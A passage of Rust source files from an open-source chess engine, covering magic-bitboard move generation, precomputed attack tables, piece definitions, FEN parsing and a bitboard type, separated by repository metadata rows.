            let (mut rook_magic, mut rook_move_tbl) = find_magic(i, BoardPiece::WhiteRook);
            rook_magic.offset = rook_moves.len();
            rook_magics[i] = rook_magic;
            rook_moves.append(&mut rook_move_tbl);
            log::trace!("Rook Magic Entry for square {i}\nMagic: {:?}", rook_magic);
        }
        // Typo fix: message previously read "Magic Entires".
        log::info!("Done Generating Magic Entries");
        MoveGenerator {
            rook_magics,
            bishop_magics,
            rook_moves,
            bishop_moves,
        }
    }
}
impl MoveGenerator {
/// Detect checkmate/stalemate for the side to move and record it on `config`.
pub fn update_state(&self, config: &mut BoardConfig) {
    // Locate the active side's king.
    let sq = match config.get_active_color() {
        Color::White => config.bitboards[BoardPiece::WhiteKing as usize].peek(),
        Color::Black => config.bitboards[BoardPiece::BlackKing as usize].peek(),
    };
    let is_attacked = self.is_sq_attacked(sq.unwrap(), !config.get_active_color(), config);
    // Does the active side have any legal move at all?
    let can_move = self
        .gen_all_moves(config.get_active_color(), config, false)
        .len()
        > 0;
    if is_attacked && !can_move {
        // In check with no legal moves: mate against the active color.
        config.set_mate(config.get_active_color());
    } else if !can_move {
        config.set_stalemate();
    }
}
/// Generate every move of `side` (all pieces) into one `MoveList`.
/// With `only_captures` set, only capturing moves are produced.
pub fn gen_all_moves(
    &self,
    side: Color,
    config: &mut BoardConfig,
    only_captures: bool,
) -> MoveList {
    let piece_set = if side == Color::White { &W_PIECES } else { &B_PIECES };
    let mut list = MoveList::new();
    for piece in piece_set {
        // Pop each occupied square of this piece type and generate from it.
        let mut occupancy = config.bitboards[*piece as usize];
        while *occupancy > 0 {
            let sq = occupancy.pop_sq().unwrap();
            self.gen_piece_moves_impl(*piece, sq, config, only_captures, &mut list);
        }
    }
    list
}
/// Generate the moves of a single `piece` standing on `pos`.
pub fn gen_piece_moves(
    &self,
    piece: BoardPiece,
    pos: Square,
    config: &mut BoardConfig,
    only_captures: bool,
) -> MoveList {
    let mut moves = MoveList::with_capacity(32);
    self.gen_piece_moves_impl(piece, pos, config, only_captures, &mut moves);
    moves
}
/// Generate the moves of `piece` on `pos` and append them to `list`.
///
/// Builds a target-square bitboard per piece type (en-passant targets are
/// collected separately), then hands it to `make_movelist`, which performs
/// the legality filtering and promotion expansion.
fn gen_piece_moves_impl(
    &self,
    piece: BoardPiece,
    pos: Square,
    config: &mut BoardConfig,
    only_captures: bool,
    list: &mut MoveList,
) {
    use BoardPiece::*;
    let (friendly, enemy) = match piece.get_color() {
        Color::White => (config.white_occupancy(), config.black_occupancy()),
        Color::Black => (config.black_occupancy(), config.white_occupancy()),
    };
    let blockers = config.all_occupancy();
    // En-passant targets are kept apart because the target square is empty,
    // so they would be dropped by the `moves & enemy` capture filter below.
    let mut ep_moves = BitBoard::default();
    let moves = match piece {
        WhiteRook => self.get_rook_moves(pos, blockers, friendly),
        BlackRook => self.get_rook_moves(pos, blockers, friendly),
        WhiteBishop => self.get_bishop_moves(pos, blockers, friendly),
        BlackBishop => self.get_bishop_moves(pos, blockers, friendly),
        WhiteKnight => self.get_knight_atk(pos) & !friendly,
        BlackKnight => self.get_knight_atk(pos) & !friendly,
        // Queen = rook moves | bishop moves.
        WhiteQueen => {
            self.get_rook_moves(pos, blockers, friendly)
                | self.get_bishop_moves(pos, blockers, friendly)
        }
        BlackQueen => {
            self.get_rook_moves(pos, blockers, friendly)
                | self.get_bishop_moves(pos, blockers, friendly)
        }
        WhiteKing => {
            let all = config.all_occupancy();
            let mut moves = self.get_king_atk(pos) & !friendly;
            // Castling: the path squares must be empty and the square the
            // king crosses must not be attacked. (Whether the king is
            // currently in check is tested later, in make_movelist.)
            if pos == Square::E1 && config.get_can_white_castle_kingside() {
                if !(all.is_set(Square::F1) || all.is_set(Square::G1))
                    && !self.is_sq_attacked(Square::F1, Color::Black, config)
                {
                    moves.set(Square::G1);
                }
            }
            if pos == Square::E1 && config.get_can_white_castle_queenside() {
                if !(all.is_set(Square::B1) || all.is_set(Square::C1) || all.is_set(Square::D1))
                    && !self.is_sq_attacked(Square::D1, Color::Black, config)
                {
                    moves.set(Square::C1);
                }
            }
            moves
        }
        BlackKing => {
            let all = config.all_occupancy();
            let mut moves = self.get_king_atk(pos) & !friendly;
            if pos == Square::E8 && config.get_can_black_castle_kingside() {
                if !(all.is_set(Square::F8) || all.is_set(Square::G8))
                    && !self.is_sq_attacked(Square::F8, Color::White, config)
                {
                    moves.set(Square::G8);
                }
            }
            if pos == Square::E8 && config.get_can_black_castle_queenside() {
                if !(all.is_set(Square::B8) || all.is_set(Square::C8) || all.is_set(Square::D8))
                    && !self.is_sq_attacked(Square::D8, Color::White, config)
                {
                    moves.set(Square::C8);
                }
            }
            moves
        }
        WhitePawn => {
            let quiet = {
                if pos < Square::A8 {
                    // not on rank 8: single push to the empty square ahead
                    let single = BitBoard::from(1 << (pos as usize + 8)) & !friendly & !enemy;
                    // double push from rank 2, only when the single push is open
                    if pos >= Square::A2 && pos <= Square::H2 && single.non_zero() {
                        (single | BitBoard::from(1 << (pos as usize + 16))) & !friendly & !enemy
                    } else {
                        single
                    }
                } else {
                    BitBoard::from(0)
                }
            };
            let atks = self.get_white_pawn_atk(pos);
            // Diagonal attacks only become moves when an enemy piece is there.
            let moves = quiet | (atks & enemy);
            if let Some(t) = config.get_en_passant_target() {
                if *atks & (1 << t as usize) > 0 {
                    *ep_moves |= 1 << t as usize;
                }
            }
            moves
        }
        BlackPawn => {
            let quiet = {
                if pos > Square::H1 {
                    // not on rank 1: single push to the empty square ahead
                    let single = BitBoard::from(1 << (pos as usize - 8)) & !friendly & !enemy;
                    // double push from rank 7, only when the single push is open
                    if pos >= Square::A7 && pos <= Square::H7 && single.non_zero() {
                        (single | BitBoard::from(1 << (pos as usize - 16))) & !friendly & !enemy
                    } else {
                        single
                    }
                } else {
                    BitBoard::from(0)
                }
            };
            let atks = self.get_black_pawn_atk(pos);
            let moves = quiet | (atks & enemy);
            if let Some(t) = config.get_en_passant_target() {
                if *atks & (1 << t as usize) > 0 {
                    *ep_moves |= 1 << t as usize;
                }
            }
            moves
        }
    };
    if only_captures {
        // Keep only captures, plus en passant (whose target square is empty).
        self.make_movelist((moves & enemy) | ep_moves, pos, config, list)
    } else {
        self.make_movelist(moves | ep_moves, pos, config, list)
    }
}
pub fn is_sq_attacked(&self, sq: Square, color: Color, config: &BoardConfig) -> bool {
match color {
Color::White => {
if (self.get_black_pawn_atk(sq) & config.get_piece_occupancy(BoardPiece::WhitePawn))
.non_zero()
{
return true;
} else if (self.get_knight_atk(sq)
& config.get_piece_occupancy(BoardPiece::WhiteKnight))
.non_zero()
{
return true;
} else if (self.get_king_atk(sq)
& config.get_piece_occupancy(BoardPiece::WhiteKing))
.non_zero()
{
return true;
} else if (self.get_bishop_atk(sq, config.all_occupancy())
& (config.get_piece_occupancy(BoardPiece::WhiteBishop)
| config.get_piece_occupancy(BoardPiece::WhiteQueen)))
.non_zero()
{
return true;
} else if (self.get_rook_atk(sq, config.all_occupancy())
& (config.get_piece_occupancy(BoardPiece::WhiteRook)
| config.get_piece_occupancy(BoardPiece::WhiteQueen)))
.non_zero()
{
return true;
} else {
return false;
}
}
Color::Black => {
if (self.get_white_pawn_atk(sq) & config.get_piece_occupancy(BoardPiece::BlackPawn))
.non_zero()
{
return true;
} else if (self.get_knight_atk(sq)
& config.get_piece_occupancy(BoardPiece::BlackKnight))
.non_zero()
{
return true;
} else if (self.get_king_atk(sq)
& config.get_piece_occupancy(BoardPiece::BlackKing))
.non_zero()
{
return true;
} else if (self.get_bishop_atk(sq, config.all_occupancy())
& (config.get_piece_occupancy(BoardPiece::BlackBishop)
| config.get_piece_occupancy(BoardPiece::BlackQueen)))
.non_zero()
{
return true;
} else if (self.get_rook_atk(sq, config.all_occupancy())
& (config.get_piece_occupancy(BoardPiece::BlackRook)
| config.get_piece_occupancy(BoardPiece::BlackQueen)))
.non_zero()
{
return true;
} else {
return false;
}
}
}
}
/// Rook attack set for `sq` given `blockers`, via magic-bitboard lookup.
fn get_rook_atk(&self, sq: Square, blockers: BitBoard) -> BitBoard {
    let magic = self.rook_magics[sq as usize];
    self.rook_moves[magic_index(&magic, blockers)]
}

/// Bishop attack set for `sq` given `blockers`, via magic-bitboard lookup.
fn get_bishop_atk(&self, sq: Square, blockers: BitBoard) -> BitBoard {
    let magic = self.bishop_magics[sq as usize];
    self.bishop_moves[magic_index(&magic, blockers)]
}
/// Precomputed white-pawn attack set for `sq`.
fn get_white_pawn_atk(&self, sq: Square) -> BitBoard {
    WP_ATK_TBL[sq as usize].into()
}

/// Precomputed black-pawn attack set for `sq`.
fn get_black_pawn_atk(&self, sq: Square) -> BitBoard {
    BP_ATK_TBL[sq as usize].into()
}

/// Precomputed knight attack set for `sq`.
fn get_knight_atk(&self, sq: Square) -> BitBoard {
    N_ATK_TBL[sq as usize].into()
}

/// Precomputed king attack set for `sq`.
fn get_king_atk(&self, sq: Square) -> BitBoard {
    K_ATK_TBL[sq as usize].into()
}

/// Rook attacks with own pieces removed (cannot capture friendlies).
fn get_rook_moves(&self, sq: Square, blockers: BitBoard, friendly: BitBoard) -> BitBoard {
    self.get_rook_atk(sq, blockers) & !friendly
}

/// Bishop attacks with own pieces removed.
fn get_bishop_moves(&self, sq: Square, blockers: BitBoard, friendly: BitBoard) -> BitBoard {
    self.get_bishop_atk(sq, blockers) & !friendly
}
/// Test pseudo-legal move `m` for `side` by playing it and checking whether
/// `side`'s own king is left attacked; the move is undone before returning.
fn is_legal(&self, m: Move, c: &mut BoardConfig, side: Color) -> bool {
    if let Some(commit) = c.make_move(m) {
        let king_sq = match side {
            Color::White => c.bitboards[BoardPiece::WhiteKing as usize].peek().unwrap(),
            Color::Black => c.bitboards[BoardPiece::BlackKing as usize].peek().unwrap(),
        };
        let res = !self.is_sq_attacked(king_sq, !side, c);
        c.undo_commit(&commit);
        return res;
    }
    // make_move refused the move entirely.
    false
}
/// Convert a target-square bitboard into `Move`s appended to `list`,
/// filtering for legality and expanding promotions into all four choices.
fn make_movelist(
    &self,
    mut moves: BitBoard,
    from: Square,
    config: &mut BoardConfig,
    list: &mut MoveList,
) {
    while *moves > 0 {
        let to = moves.pop_sq().unwrap();
        let m = Move::infer(from, to, config);
        let p = m.p;
        if m.is_prom() {
            use BoardPiece::*;
            // All four promotion choices share from/to squares, so legality
            // is checked once (via the rook promotion) per color.
            match p.get_color() {
                Color::White => {
                    let m = Move::new_prom(from, to, p, m.capture, WhiteRook);
                    if self.is_legal(m, config, p.get_color()) {
                        list.push(m);
                        list.push(Move::new_prom(from, to, p, m.capture, WhiteBishop));
                        list.push(Move::new_prom(from, to, p, m.capture, WhiteKnight));
                        list.push(Move::new_prom(from, to, p, m.capture, WhiteQueen));
                    }
                }
                Color::Black => {
                    let m = Move::new_prom(from, to, p, m.capture, BlackRook);
                    if self.is_legal(m, config, p.get_color()) {
                        // BUG FIX: the rook promotion itself was never pushed
                        // for Black (asymmetric with the White arm above).
                        list.push(m);
                        list.push(Move::new_prom(from, to, p, m.capture, BlackBishop));
                        list.push(Move::new_prom(from, to, p, m.capture, BlackKnight));
                        list.push(Move::new_prom(from, to, p, m.capture, BlackQueen));
                    }
                }
            }
        } else {
            // Castling is not allowed while the king is currently in check.
            if let MoveType::Castle(_) = m.move_type {
                if self.is_sq_attacked(from, !p.get_color(), config) {
                    continue;
                }
            }
            if self.is_legal(m, config, p.get_color()) {
                list.push(m);
            }
        }
    }
}
}
| rust | MIT | 6916b36b2a0ef29864a140207c52588b3d201799 | 2026-01-04T20:21:38.332169Z | false |
ParthPant/chess-rs | https://github.com/ParthPant/chess-rs/blob/6916b36b2a0ef29864a140207c52588b3d201799/chrs-lib/src/generator/tables.rs | chrs-lib/src/generator/tables.rs | use crate::data::{BitBoard, BoardPiece, Color};
use crate::prng::*;
pub const NOT_A_FILE: u64 = {
let mut x: u64 = 0;
let mut i = 0;
while i < 64 {
if i % 8 != 0 {
x |= 1 << i;
}
i = i + 1;
}
x
};
pub const NOT_AB_FILE: u64 = {
let mut x: u64 = 0;
let mut i = 0;
while i < 64 {
if i % 8 != 0 && i % 8 != 1 {
x |= 1 << i;
}
i = i + 1;
}
x
};
pub const NOT_H_FILE: u64 = {
let mut x: u64 = 0;
let mut i = 0;
while i < 64 {
if i % 8 != 7 {
x |= 1 << i;
}
i = i + 1;
}
x
};
pub const NOT_GH_FILE: u64 = {
let mut x: u64 = 0;
let mut i = 0;
while i < 64 {
if i % 8 != 7 && i % 8 != 6 {
x |= 1 << i;
}
i = i + 1;
}
x
};
pub const WP_ATK_TBL: [u64; 64] = {
let mut i = 0;
let mut table: [u64; 64] = [0; 64];
while i < 64 {
table[i] = generate_pawn_attack(Color::White, i);
i += 1;
}
table
};
/// Precomputed black-pawn attack masks, indexed by square (a1 = 0 .. h8 = 63).
pub const BP_ATK_TBL: [u64; 64] = {
    let mut table = [0u64; 64];
    let mut sq = 0;
    while sq < 64 {
        table[sq] = generate_pawn_attack(Color::Black, sq);
        sq += 1;
    }
    table
};
/// Precomputed knight attack masks, indexed by square (a1 = 0 .. h8 = 63).
pub const N_ATK_TBL: [u64; 64] = {
    let mut table = [0u64; 64];
    let mut sq = 0;
    while sq < 64 {
        table[sq] = generate_knight_attack(sq);
        sq += 1;
    }
    table
};
/// Precomputed king attack masks, indexed by square (a1 = 0 .. h8 = 63).
pub const K_ATK_TBL: [u64; 64] = {
    let mut table = [0u64; 64];
    let mut sq = 0;
    while sq < 64 {
        table[sq] = generate_king_attack(sq);
        sq += 1;
    }
    table
};
/// Attack mask for a pawn of `side` standing on `sq` (0..64).
/// Captures that would wrap across the board edge are masked off.
const fn generate_pawn_attack(side: Color, sq: usize) -> u64 {
    let pawn: u64 = 1 << sq;
    match side {
        // Up-left (<<7) can wrap onto the h-file; up-right (<<9) onto the a-file.
        Color::White => ((pawn << 7) & NOT_H_FILE) | ((pawn << 9) & NOT_A_FILE),
        // Black mirrors the same pattern downward.
        Color::Black => ((pawn >> 7) & NOT_A_FILE) | ((pawn >> 9) & NOT_H_FILE),
    }
}
/// Attack mask for a knight on `sq`; wrapped landings near the a/b and
/// g/h files are masked off.
const fn generate_knight_attack(sq: usize) -> u64 {
    let origin: u64 = 1 << sq;
    // All eight knight offsets; << moves up the board, >> moves down.
    let mut attacks = (origin << 6)
        | (origin << 15)
        | (origin << 10)
        | (origin << 17)
        | (origin >> 6)
        | (origin >> 15)
        | (origin >> 10)
        | (origin >> 17);
    let file = sq % 8;
    // From files a/b a wrapped jump lands on g/h, and vice versa.
    if file <= 1 {
        attacks &= NOT_GH_FILE;
    }
    if file >= 6 {
        attacks &= NOT_AB_FILE;
    }
    attacks
}
/// Attack mask for a king on `sq`; wrapped landings on the far file are
/// masked off.
const fn generate_king_attack(sq: usize) -> u64 {
    let origin: u64 = 1 << sq;
    // All eight king offsets; << moves up the board, >> moves down.
    let mut attacks = (origin << 8)
        | (origin >> 8)
        | (origin >> 1)
        | (origin << 1)
        | (origin >> 9)
        | (origin << 9)
        | (origin >> 7)
        | (origin << 7);
    let file = sq % 8;
    if file == 0 {
        attacks &= NOT_H_FILE;
    }
    if file == 7 {
        attacks &= NOT_A_FILE;
    }
    attacks
}
/// One entry of a magic-bitboard lookup: the relevancy mask, the magic
/// multiplier, the width of the hash index, and the slice offset into the
/// shared attack table.
#[derive(Debug, Default, Clone, Copy)]
pub struct MagicEntry {
    /// Squares whose occupancy affects this slider's attacks.
    pub relevant_occupancy: u64,
    /// Multiplier used to perfect-hash the masked occupancy.
    pub magic: u64,
    /// Number of high bits of the product used as the table index.
    pub index_bits: u8,
    /// Base offset of this square's sub-table.
    pub offset: usize,
}
pub struct TableFillError;
/// Maps an occupancy bitboard to the attack-table slot for `entry`:
/// mask, multiply by the magic, and keep the top `index_bits` bits.
pub fn magic_index(entry: &MagicEntry, blockers: BitBoard) -> usize {
    let relevant = *blockers & entry.relevant_occupancy;
    let hash = relevant.wrapping_mul(entry.magic);
    (hash >> (64 - entry.index_bits)) as usize + entry.offset
}
/// Tries to fill an attack table for `sq` using the candidate magic.
///
/// Enumerates every subset of the relevancy mask and stores the slider's
/// attacks at the hashed index. Returns `Err(TableFillError)` on a
/// destructive collision (two subsets hashing to one slot with different
/// attack sets); identical-attack collisions are harmless and allowed.
fn try_make_table(
    sq: usize,
    slider: BoardPiece,
    magic: &MagicEntry,
) -> Result<Vec<BitBoard>, TableFillError> {
    let mut table = vec![BitBoard::default(); 1 << magic.index_bits];
    // `subset` walks every subset of the relevancy mask, starting from
    // the empty occupancy.
    let mut subset: u64 = 0;
    loop {
        let table_entry = &mut table[magic_index(magic, subset.into())];
        let moves = match slider {
            BoardPiece::WhiteRook | BoardPiece::BlackRook => generate_rook_attack(sq, subset),
            BoardPiece::WhiteBishop | BoardPiece::BlackBishop => generate_bishop_attack(sq, subset),
            _ => panic!("{:?} is not a sliding Piece", slider),
        };
        if *table_entry == 0 {
            // Empty slot (attacks can never be 0 for a slider): claim it.
            *table_entry = moves.into();
        } else if *table_entry != moves {
            // Destructive collision: this magic is unusable.
            return Err(TableFillError);
        }
        // Carry-Rippler trick: advances to the next subset of the mask,
        // returning to 0 after the full mask itself.
        subset = subset.wrapping_sub(magic.relevant_occupancy) & magic.relevant_occupancy;
        if subset == 0 {
            break;
        }
    }
    Ok(table)
}
/// Searches random candidate magics for `sq` until one hashes every
/// relevant occupancy subset without a destructive collision, returning
/// the entry together with its filled attack table.
///
/// # Panics
/// Panics if `slider` is not a rook or a bishop.
pub fn find_magic(sq: usize, slider: BoardPiece) -> (MagicEntry, Vec<BitBoard>) {
    let relevant_occupancy = match slider {
        BoardPiece::WhiteRook | BoardPiece::BlackRook => rook_relevant_occupancy(sq),
        BoardPiece::WhiteBishop | BoardPiece::BlackBishop => bishop_relevant_occupancy(sq),
        _ => panic!("{:?} is not a sliding Piece", slider),
    };
    // The index width depends only on the mask; hoisted out of the retry
    // loop instead of being recomputed for every candidate magic.
    let index_bits = relevant_occupancy.count_ones() as u8;
    loop {
        // AND-ing three random words biases toward sparse magics, which
        // empirically find collision-free hashes sooner.
        let magic = random_u64() & random_u64() & random_u64();
        let magic_entry = MagicEntry {
            relevant_occupancy,
            magic,
            index_bits,
            offset: 0,
        };
        if let Ok(table) = try_make_table(sq, slider, &magic_entry) {
            return (magic_entry, table);
        }
    }
}
/// Relevancy mask for a bishop on `sq`: every square sharing a diagonal
/// with `sq`, excluding `sq` itself and all board-edge squares (edge
/// occupancy never changes a slider's reachable set).
const fn bishop_relevant_occupancy(sq: usize) -> u64 {
    let r0 = (sq / 8) as i8;
    let f0 = (sq % 8) as i8;
    let mut mask = 0u64;
    let mut s: i8 = 0;
    while s < 64 {
        let r = s / 8;
        let f = s % 8;
        let dr = r - r0;
        let df = f - f0;
        let same_diagonal = (dr == df || dr == -df) && dr != 0;
        let interior = r > 0 && r < 7 && f > 0 && f < 7;
        if same_diagonal && interior {
            mask |= 1 << s;
        }
        s += 1;
    }
    mask
}
/// Relevancy mask for a rook on `sq`: every square on the same rank or
/// file, excluding `sq` itself and the terminal edge square of each ray
/// (its occupancy never changes the reachable set).
const fn rook_relevant_occupancy(sq: usize) -> u64 {
    let r0 = (sq / 8) as i8;
    let f0 = (sq % 8) as i8;
    let mut mask = 0u64;
    let mut s: i8 = 0;
    while s < 64 {
        let r = s / 8;
        let f = s % 8;
        // Same file: drop ranks 1 and 8; same rank: drop files a and h.
        let on_file = f == f0 && r != r0 && r > 0 && r < 7;
        let on_rank = r == r0 && f != f0 && f > 0 && f < 7;
        if on_file || on_rank {
            mask |= 1 << s;
        }
        s += 1;
    }
    mask
}
/// Bishop attacks from `sq` given the occupancy `block`: each diagonal
/// ray extends to the board edge and includes the first blocker square.
const fn generate_bishop_attack(sq: usize, block: u64) -> u64 {
    // Walks one ray from (r, f) in direction (dr, df), including the
    // first blocker it hits, stopping at the board edge.
    const fn ray(mut r: i8, mut f: i8, dr: i8, df: i8, block: u64) -> u64 {
        let mut attacks = 0u64;
        while 0 <= r && r <= 7 && 0 <= f && f <= 7 {
            let bit = 1u64 << (r * 8 + f);
            attacks |= bit;
            if block & bit != 0 {
                break;
            }
            r += dr;
            f += df;
        }
        attacks
    }
    let r = (sq / 8) as i8;
    let f = (sq % 8) as i8;
    ray(r + 1, f + 1, 1, 1, block)
        | ray(r + 1, f - 1, 1, -1, block)
        | ray(r - 1, f + 1, -1, 1, block)
        | ray(r - 1, f - 1, -1, -1, block)
}
/// Rook attacks from `sq` given the occupancy `block`: each orthogonal
/// ray extends to the board edge and includes the first blocker square.
const fn generate_rook_attack(sq: usize, block: u64) -> u64 {
    // Walks one ray from (r, f) in direction (dr, df), including the
    // first blocker it hits, stopping at the board edge.
    const fn ray(mut r: i8, mut f: i8, dr: i8, df: i8, block: u64) -> u64 {
        let mut attacks = 0u64;
        while 0 <= r && r <= 7 && 0 <= f && f <= 7 {
            let bit = 1u64 << (r * 8 + f);
            attacks |= bit;
            if block & bit != 0 {
                break;
            }
            r += dr;
            f += df;
        }
        attacks
    }
    let r = (sq / 8) as i8;
    let f = (sq % 8) as i8;
    ray(r + 1, f, 1, 0, block)
        | ray(r - 1, f, -1, 0, block)
        | ray(r, f + 1, 0, 1, block)
        | ray(r, f - 1, 0, -1, block)
}
| rust | MIT | 6916b36b2a0ef29864a140207c52588b3d201799 | 2026-01-04T20:21:38.332169Z | false |
ParthPant/chess-rs | https://github.com/ParthPant/chess-rs/blob/6916b36b2a0ef29864a140207c52588b3d201799/chrs-lib/src/data/piece.rs | chrs-lib/src/data/piece.rs | use std::ops::Not;
use strum_macros::{Display, EnumIter, EnumString};
/// Side to move / piece ownership.
#[derive(Debug, Clone, Copy, Eq, PartialEq, Hash, Display)]
pub enum Color {
    White,
    Black,
}
impl Not for Color {
type Output = Self;
fn not(self) -> Self {
use Color::*;
match self {
White => Black,
Black => White,
}
}
}
/// All twelve piece kinds. The strum serializations are the FEN letters
/// (uppercase = White, lowercase = Black) and are part of the on-disk /
/// FEN format — do not change them.
#[derive(Debug, Clone, Copy, Eq, PartialEq, Hash, Display, EnumString, EnumIter)]
pub enum BoardPiece {
    #[strum(serialize = "P")]
    WhitePawn,
    #[strum(serialize = "N")]
    WhiteKnight,
    #[strum(serialize = "B")]
    WhiteBishop,
    #[strum(serialize = "R")]
    WhiteRook,
    #[strum(serialize = "Q")]
    WhiteQueen,
    #[strum(serialize = "K")]
    WhiteKing,
    #[strum(serialize = "p")]
    BlackPawn,
    #[strum(serialize = "n")]
    BlackKnight,
    #[strum(serialize = "b")]
    BlackBishop,
    #[strum(serialize = "r")]
    BlackRook,
    #[strum(serialize = "q")]
    BlackQueen,
    #[strum(serialize = "k")]
    BlackKing,
}
impl BoardPiece {
    /// Side that owns this piece.
    pub fn get_color(&self) -> Color {
        use BoardPiece::*;
        match self {
            WhitePawn | WhiteKnight | WhiteBishop | WhiteRook | WhiteQueen | WhiteKing => {
                Color::White
            }
            BlackPawn | BlackKnight | BlackBishop | BlackRook | BlackQueen | BlackKing => {
                Color::Black
            }
        }
    }

    /// Unicode figurine used when pretty-printing boards.
    pub fn utf_str(&self) -> &'static str {
        use BoardPiece::*;
        match self {
            WhitePawn => "♙",
            WhiteKnight => "♘",
            WhiteBishop => "♗",
            WhiteRook => "♖",
            WhiteQueen => "♕",
            WhiteKing => "♔",
            BlackPawn => "♟",
            BlackKnight => "♞",
            BlackBishop => "♝",
            BlackRook => "♜",
            BlackQueen => "♛",
            BlackKing => "♚",
        }
    }
}
pub const W_PIECES: [BoardPiece; 6] = {
use BoardPiece::*;
[
WhiteKing,
WhitePawn,
WhiteRook,
WhiteQueen,
WhiteBishop,
WhiteKnight,
]
};
pub const B_PIECES: [BoardPiece; 6] = {
use BoardPiece::*;
[
BlackKing,
BlackPawn,
BlackRook,
BlackQueen,
BlackBishop,
BlackKnight,
]
};
| rust | MIT | 6916b36b2a0ef29864a140207c52588b3d201799 | 2026-01-04T20:21:38.332169Z | false |
ParthPant/chess-rs | https://github.com/ParthPant/chess-rs/blob/6916b36b2a0ef29864a140207c52588b3d201799/chrs-lib/src/data/fen.rs | chrs-lib/src/data/fen.rs | use std::str::FromStr;
use crate::data::{BoardMap, CastleFlags, GameState};
use crate::zobrist::hash;
use super::piece::{BoardPiece, Color};
use super::square::Square;
use super::BoardConfig;
pub struct Fen;
impl Fen {
pub fn make_config_from_str(s: &str) -> BoardConfig {
Fen::make_config(s)
}
pub fn make_fen_from_config(c: &BoardConfig) -> String {
let mut s = String::new();
for y in (0..8).rev() {
let mut empty = 0;
for x in 0..8 {
if let Some(p) = c.get_at_sq((x, y).try_into().unwrap()) {
if empty > 0 {
s.push_str(&empty.to_string());
empty = 0;
}
s.push_str(&p.to_string());
} else {
empty = empty + 1;
}
}
if empty > 0 {
s.push_str(&empty.to_string());
}
if y > 0 {
s.push('/');
}
}
match c.get_active_color() {
Color::White => s.push_str(" w "),
Color::Black => s.push_str(" b "),
}
if c.get_can_white_castle_kingside() {
s.push('K');
}
if c.get_can_white_castle_queenside() {
s.push('Q');
}
if c.get_can_black_castle_kingside() {
s.push('k');
}
if c.get_can_black_castle_queenside() {
s.push('q');
}
s.push(' ');
if let Some(pos) = c.get_en_passant_target() {
s.push_str(&pos.to_string().to_lowercase());
} else {
s.push('-');
}
s.push(' ');
s.push_str(&c.get_halfmove_clock().to_string());
s.push(' ');
s.push_str(&c.get_fullmove_number().to_string());
s
}
fn get_piece_from_c(c: char) -> BoardPiece {
if let Ok(p) = BoardPiece::from_str(&c.to_string()) {
p
} else {
log::error!("Fen Error: {} is invalid piece", c);
panic!();
}
}
fn get_sq_from_code(s: &str) -> Square {
let a = 'a'.to_ascii_lowercase() as usize;
let mut it = s.chars();
let c = it.next().unwrap();
let x = if c.is_alphabetic() {
c.to_ascii_lowercase() as usize - a
} else {
log::error!("Fen Error: {} is invalid square", s);
panic!();
};
let n: String = it.collect();
let y = n.parse::<usize>().unwrap() - 1;
log::debug!("decode {} to {:?}", s, (x, y));
(x, y).try_into().unwrap()
}
// TODO: Return Result with custom error type
fn make_config(fen_str: &str) -> BoardConfig {
log::trace!("Making BoardConfig...");
let mut castle_flags = CastleFlags::default();
let mut en_passant_target: Option<Square> = None;
let mut halfmove_clock = 0;
let mut fullmove_number = 0;
let mut active_color = Color::White;
let mut bitboards: BoardMap = Default::default();
for (i, data) in fen_str.split_whitespace().enumerate() {
log::trace!("Parcing Fen field {}, {}", i, data);
match i {
0 => {
for (i, rank) in data.split('/').enumerate() {
let mut x = 0;
for c in rank.chars() {
if c.is_digit(10) {
x = x + c.to_digit(10).unwrap();
} else {
log::debug!("Place {c} at {:?}", (7 - i, x));
bitboards[Fen::get_piece_from_c(c) as usize]
.set(Square::try_from((x as usize, 7 - i)).unwrap());
x = x + 1;
}
}
}
}
1 => {
if data.len() > 1 {
log::error!("Fen Error: Active color field is wrong");
} else {
if let Some(c) = data.chars().next() {
match c {
'w' => {
active_color = Color::White;
}
'b' => {
active_color = Color::Black;
}
_ => {
log::error!("Fen Error: {} is invalid color", c);
panic!();
}
}
}
}
}
2 => {
if data.len() == 1 && data.chars().next() == Some('-') {
} else {
let mut chars = data.chars();
while let Some(c) = chars.next() {
match c {
'k' => castle_flags.set_black_oo(),
'q' => castle_flags.set_black_ooo(),
'K' => castle_flags.set_white_oo(),
'Q' => castle_flags.set_white_ooo(),
_ => {
log::error!("Fen Error: {} is invalid", c);
panic!();
}
}
}
}
}
3 => {
if data.len() == 1 && data.chars().next() == Some('-') {
} else {
en_passant_target = Some(Self::get_sq_from_code(data));
}
}
4 => {
if let Ok(n) = data.parse::<u8>() {
halfmove_clock = n;
} else {
log::error!("Fen Error: {} is invalid halfmove", data);
panic!();
}
}
5 => {
if let Ok(n) = data.parse::<u8>() {
fullmove_number = n;
} else {
log::error!("Fen Error: {} is invalid fullmove", data);
panic!();
}
}
_ => {
log::error!("Fen Error: Extra Fields");
panic!();
}
};
}
log::trace!("Done..");
let mut c = BoardConfig {
active_color,
en_passant_target,
castle_flags,
halfmove_clock,
fullmove_number,
bitboards,
move_history: Default::default(),
state: GameState::InPlay,
hash: 0,
};
c.hash = hash(&c);
c
}
}
| rust | MIT | 6916b36b2a0ef29864a140207c52588b3d201799 | 2026-01-04T20:21:38.332169Z | false |
ParthPant/chess-rs | https://github.com/ParthPant/chess-rs/blob/6916b36b2a0ef29864a140207c52588b3d201799/chrs-lib/src/data/bitboard.rs | chrs-lib/src/data/bitboard.rs | use super::square::Square;
use std::cmp::PartialEq;
use std::fmt::Display;
use std::ops::{BitAnd, BitAndAssign, BitOr, BitOrAssign, Deref, DerefMut, Not, Shl, Shr};
/// A 64-bit board set: bit i corresponds to square i (a1 = 0 .. h8 = 63).
#[derive(Debug, Clone, Copy, Default, PartialOrd, Ord, Eq, PartialEq)]
pub struct BitBoard(u64);
// Deref to the raw u64 so callers can use integer ops directly.
impl Deref for BitBoard {
    type Target = u64;
    fn deref(&self) -> &Self::Target {
        &self.0
    }
}
// Mutable access to the raw u64 (used by BoardConfig's bit twiddling).
impl DerefMut for BitBoard {
    fn deref_mut(&mut self) -> &mut Self::Target {
        &mut self.0
    }
}
impl BitBoard {
    /// Sets the bit for `sq`.
    pub fn set(&mut self, sq: Square) {
        self.0 |= (1 as u64) << sq as usize;
    }
    /// Clears the bit for `sq`.
    pub fn unset(&mut self, sq: Square) {
        self.0 &= !((1 as u64) << sq as usize);
    }
    /// Returns true when the bit for `sq` is set.
    pub fn is_set(&self, sq: Square) -> bool {
        self.0 & ((1 as u64) << sq as usize) > 0
    }
    /// Clears `prev` and sets `new` (moves one occupant).
    pub fn make_move(&mut self, prev: Square, new: Square) {
        self.unset(prev);
        self.set(new);
    }
    /// Removes and returns the lowest set square, or `None` when empty.
